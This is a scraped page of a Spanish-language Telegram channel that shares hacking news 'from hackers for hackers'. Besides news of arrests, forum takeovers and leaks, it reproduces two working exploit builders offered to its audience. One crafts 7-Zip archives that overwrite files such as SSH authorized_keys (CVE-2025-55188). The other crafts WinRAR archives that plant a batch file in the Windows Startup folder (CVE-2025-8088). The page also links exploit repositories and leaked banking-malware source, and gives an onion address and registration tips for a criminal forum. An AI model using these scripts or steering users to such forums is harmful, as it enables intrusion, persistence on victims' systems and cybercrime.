FSEC INTEL ES 2.0 📡 🏴‍☠️ – Telegram
FSEC INTEL ES 2.0 📡 🏴‍☠️
547 subscribers
272 photos
27 videos
14 files
183 links
Inteligencia de Amenazas de Hackers para Hackers. 📡

Estamos de vuelta!!

X : https://x.com/FsecIntelEs
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
La policía española detiene a pirata informático por pirateo a Bancos e Instituciones educativas 🚨🚔

La policía española en conjunto con los Mossos d'Esquadra detuvieron a un pirata informático acusado de orquestar ataques informáticos a diferentes bancos españoles, una autoescuela y una universidad publica.

Según la prensa el hombre arrestado es un estudiante de informática aun no se a dado nombres ni edad del acusado, en el interior de su departamento se encontraron varios telefonos celulares, discos duros y varias tarjetas de credito.

El pirata informatico pirateaba bases de datos los cuales eran compartidos y/o vendidos en foros clandestinos de la red.

https://www.lavanguardia.com/local/girona/20250731/10939717/detienen-hacker-responsable-lanzar-multiples-ciberataques-girona.html

#busted #españa #hacker #video
🔥7😱21
Forwarded from 🇨🇱 Chileaks
Se confirma que el administrador original fue arrestado en Kyiv, y que el nuevo “administrador” es un completo desconocido.
No sólo Tokha enfrenta cargos, sino que el foro completo está bajo investigación, lo que implica riesgo directo para todos sus usuarios.

🛡 Los antiguos moderadores de XSS han lanzado una nueva plataforma alternativa y segura:
🔗 Onion: http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd[.]onion

⚠️ Recomendaciones para el registro en DamageLib:

— Usar un nick nuevo

— No ingresar un e-mail real (no se usará)

— NO se puede recuperar contraseña, guárdala bien

Datos importantes (según conversaciones privadas con Rehub,
– Esta decisión fue acordada por los moderadores más conocidos: 174region174, DildoFagins, gliderexpert, IIIIXX, Marcus52, ordinaria1, Quake3, Rehub, r_as, stooper, varwar, weaver, e incluso Ares y la Bratva (aún se esperan confirmaciones finales).
– DamageLib no posee la base de usuarios de XSS, sólo se migraron los temas.
– El nuevo administrador de DamageLib es gliderexpert, ex-mod de XSS.
– A Stepanych lo desbanearon recientemente (ver captura 4), no fue el nuevo admin sino el mod Quake3. Querían conocer su visión de la situación.

Existe la teoría de que el nuevo admin de XSS es el antiguo admin de Expe, un personaje notoriamente millonario. Algunos creen que compró el foro a Tokha simplemente porque puede hacerlo —y para asegurarse de que nadie lea sus mensajes privados ni acceda al servidor Jabber—.
Recordemos cómo apoyó al antiguo admin en discusiones sobre 2FA. Tokha solía decir: “Todos lo conocemos, pero quiere seguir en el anonimato”. ¿Coincidencia?

Si esto es cierto, es lógico pensar que:
– Tokha le confió el foro sabiendo que incluso los 45 BTC en depósitos no significaban nada para él.
– El nuevo admin habría decidido no revelar su identidad, ni siquiera a los nuevos moderadores.
8🔥1
Forwarded from Proxy Bar
CVE-2025-55188
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
#!/bin/bash
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
exit 1
fi

PAYLOAD="$1"
TARGET="$2"
OUT="$3"

WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"

tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null

echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"
9
Hackers logran piratear a grupo APT norcoreano dedicado a atacar a Corea del Sur 🇰🇵

Un duo de Hacker logro obtener herramientas, Exploits, datos de VPS y de computadoras personales de un miembro de un grupo de Hackers patrocinados por Corea del Norte el cual llamaron Kimsuky.

Mediante un Papers de la mítica revista para Hackers Phrack, los Hackers Saber y cyb0rg dieron a conocer el Hack, el cual llamaron "APT Down - The North Korea Files" en donde exponen contraseñas de VPS's, datos de navegación y captura de pantalla de un pirata informático el cual se presume que se trate de un Chino trabajando para el gobierno norcoreano.

https://data.ddosecrets.com/APT%20Down%20-%20The%20North%20Korea%20Files/


#coreadelnorte #hacker #busted #leak #apt
😱12👀6🤣21👎1
This media is not supported in your browser
VIEW IN TELEGRAM
Piratas informáticos iranies ponen a la venta Exploit 0Day de Gestor de combustible Gasboy 🇮🇷💣

Gasboy es un sistema el cual permite administrar gasolineras de manera centralizada. El grupo de Hackers Pro-Iran APT Iran se encuentra vendiendo un Exploit dia cero de tipo RCE por un valor de 15,000$, mediante un video en su cuenta de Telegram se puede ver como los piratas logran ejecutar comandos en un servidor aparentemente comprometido.

FUENTE:
https://news.1rj.ru/str/APTIRAN

#aptiran #iran #hacker #exploit
🔥11
Forwarded from Private Forum
🛸CVE-2025-8088 : WinRAR exploiting CVE-2025-8088 using ADS and path traversal
🪮Code :
import subprocess
import os
import argparse

def create_malicious_rar(output_file, decoy_file, traversal_levels=5):
"""
Creates a malicious RAR exploiting CVE-2025-8088 using ADS and path traversal.
"""
# Create payload content
payload_content = "@echo off\r\nstart calc.exe"
payload_path = "payload.bat"
with open(payload_path, 'w') as f:
f.write(payload_content)

# Create decoy if not provided
if not decoy_file:
decoy_file = "decoy.txt"
with open(decoy_file, 'w') as f:
f.write("Harmless decoy file.")

# Build traversal path with space for bypass
traversal = "/../ " * traversal_levels
ads_path = f"{os.path.basename(decoy_file)}:{traversal}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/payload.bat"

# Add decoy to RAR
subprocess.run(["rar", "a", output_file, decoy_file], check=True)

# Add ADS payload with traversal (redirect payload content)
with open(payload_path, 'rb') as payload:
subprocess.run(["rar", "a", output_file, ads_path], stdin=payload, check=True)

# Clean up
os.remove(payload_path)
if decoy_file == "decoy.txt":
os.remove(decoy_file)

print(f"Malicious RAR created: {output_file}")

if __name__ == "__main__":
parser = argparse.ArgumentParser(denoscription="POC for CVE-2025-8088 WinRAR ADS Traversal")
parser.add_argument("--output", default="poc_8088.rar", help="Output RAR file")
parser.add_argument("--decoy", help="Path to decoy file (e.g., PDF)")
parser.add_argument("--levels", type=int, default=5, help="Traversal levels (4-8)")

args = parser.parse_args()
create_malicious_rar(args.output, args.decoy, args.levels)

🍀Github : https://github.com/search?q=CVE-2025-8088
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
😱8👍1👎1🔥1
Forwarded from Private Forum
This media is not supported in your browser
VIEW IN TELEGRAM
🛸CVE-2025-25256 : Fortinet FortiSIEM - unauthenticated OS Command Injection (RCE)
🪮PoC : https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👎1
Gobierno indio Hacked 🏴‍☠️ 🇮🇳

#fuckgob #india
🔥9
He estado jugando con un Exploit 0Day muy bonito regalado por los chicos de Scattered Spider alias Lapsus$, los chicos han estado muy activos este mes atacando Burgen King Brazil junto a la policia brasileña y en las ultimas semanas a estado amenazando al CEO de la empresa de ciberseguridad Crowdstrike por tirar informacion de sus servidores.

Recientemente publicaron un Exploit el cual permite subir ficheros al servidor victima sin ningún tipo de restricción, CVE-2025-31324 es el cve para el Exploit, les dejo el Github...

https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324

FUENTE:
https://news.1rj.ru/str/+vs8Sn8tCsrk1ZDk1

#exploit #rce #scattered #lapsus #github
15👏2
Se Filtra codigo fuente de Malware Bancario para Android 📡

Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente peligrosas como la de asimilar y superponer mas de 700 aplicaciones bancarias capaz de robar usuarios y contraseñas, también el Malware es capaz de enviar SMS y realizar llamadas telefónicas.

https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3

#malware #leak #ermac #android #botnet
🔥13🥰41